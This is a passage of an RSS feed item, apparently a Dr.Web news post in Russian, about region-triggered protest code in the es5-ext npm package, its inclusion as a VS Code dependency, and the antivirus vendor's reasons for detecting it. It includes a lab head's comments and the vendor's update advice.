class="image"&gt;&lt;img src="https://st.drweb.com/static/f2_admin/LLc9sP8d5oH7CgIp.png"&gt;&lt;/figure&gt;&lt;p&gt;Данный вредоносный скрипт запускается при соответствии условия часового пояса российских городов. Их полный список можно увидеть на скриншоте: среди них Анадырь, Барнаул, Калининград, Самара и многие другие.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Чем опасен данный код и почему мы его детектируем&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;Разработчик пакета es5-ext добавил в код вывод всплывающего сообщения в консоль при определенных условиях. Специалисты «Доктор Веб» классифицируют данное поведение как злонамеренную вставку вредоносного кода, не имеющего никакого отношения к функционалу библиотеки, направленную против части пользователей на основе региональной принадлежности, что является достаточным основанием для детектирования.&lt;/p&gt;&lt;p&gt;На данный момент код выполняет только агитационную функцию, но разработчик в любой момент может заменить данный код и наделить его другими функциями: например, с помощью него он сможет удалить все ваши данные с компьютера. Такие случаи в нашей практике уже фиксировались.&lt;/p&gt;&lt;p&gt;Несмотря на то, что о наличии данного кода в библиотеке профессиональному сообществу известно давно, компания Microsoft инкорпорировала этот пакет в свое программное обеспечение в качестве зависимости.&lt;/p&gt;&lt;h3&gt;&lt;strong&gt;Последствия для пользователей&lt;/strong&gt;&lt;/h3&gt;&lt;p&gt;В результате этого решения все пользователи, обновляющие MS VS Code автоматически, получают вместе с обновлением и «малварный» пакет. Срабатывание антивируса происходит именно в момент загрузки или распаковки обновления, содержащего скомпрометированную библиотеку.&lt;/p&gt;&lt;blockquote&gt;&lt;p&gt;&lt;strong&gt;Игорь Здобнов, руководитель антивирусной лаборатории «Доктор Веб»:&lt;/strong&gt;&lt;/p&gt;&lt;p&gt;Мотивы, по которым Microsoft включила в зависимость заведомо сомнительный пакет, нам неведомы. Мы рекомендуем пользователям обратить внимание на срабатывания антивируса и, при необходимости, временно приостановить автоматическое обновление до выяснения обстоятельств со стороны разработчика.&lt;/p&gt;&lt;/blockquote&gt;&lt;p&gt;«Доктор Веб» настоятельно рекомендует пользователям проверять все загружаемые обновления и обращать внимание на предупреждения антивирусного программного обеспечения. Последняя версия MS VS Code, где нет указанной проблемы &lt;span style="background-color:rgb(255,255,255);color:rgb(10,10,10);font-family:&amp;quot;Google Sans&amp;quot;, Arial, sans-serif;font-size:16px;"&gt;&lt;span style="-webkit-text-stroke-width:0px;display:inline !important;float:none;font-style:normal;font-variant-caps:normal;font-variant-ligatures:normal;font-weight:400;letter-spacing:normal;orphans:2;text-align:start;text-decoration-color:initial;text-decoration-style:initial;text-decoration-thickness:initial;text-indent:0px;text-transform:none;white-space:normal;widows:2;word-spacing:0px;"&gt;—&lt;/span&gt;&lt;/span&gt; 1.115.&lt;/p&gt;</description></item></channel></rss>
